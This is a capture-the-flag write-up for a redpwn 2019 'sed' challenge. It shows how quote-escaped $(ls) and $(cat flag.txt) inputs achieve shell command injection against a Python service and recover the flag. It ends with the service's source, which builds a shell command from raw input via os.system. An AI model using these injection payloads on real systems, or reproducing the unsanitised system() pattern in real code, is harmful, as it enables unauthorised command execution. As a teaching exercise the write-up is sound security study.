Tags: bash misc
Rating: 5.0
In this misc challenge with description:
I'm not really sure what I sed to this program, so it fixes it for me!
nc chall2.2019.redpwn.net 6004
We are prompted three times for some input related to sed usage, let's put random things
What you thought you sed
abcdef
What you aren't sure you sed
b
What you actually sed
c
You actually said
accdef
It seems that it asks for a string, then a pattern to substitute and the string to substitute with. Syntax of the command could be similar to:
echo $1 | sed 's/$2/$3/g'
Let's try to get a RCE using $(command) syntax:
What you thought you sed
$(ls)
What you aren't sure you sed
a
What you actually sed
a
You actually said
$(ls)
He is treating the input as a properly string, let's try to escape it using quotes:
What you thought you sed
'$(ls)'
What you aren't sure you sed
a
What you actually sed
a
You actually said
bin boot dev etc flag.txt home lib lib64 media mnt opt proc root run sbin sed.py srv sys tmp usr var
It works! To get the flag we just need to cat the corresponding file
What you thought you sed
'$(cat flag.txt)'
What you aren't sure you sed
a
What you actually sed
a
You actually said
flag{th4ts_wh4t_sh3_sed}
P.S: Let's have fun dumping the software used for this challenge using $(cat sed.py), the result is:
from os import system
inp = input("What you thought you sed")
rep = '/' + input("What you aren't sure you sed") + '/'
new = input("What you actually sed")
cmd = 's' + rep + new + "/g"
if "'" not in new:
cmd += "'"
print(cmd)
print("You actually said")
system("echo '" + inp + "' | sed '" + cmd)
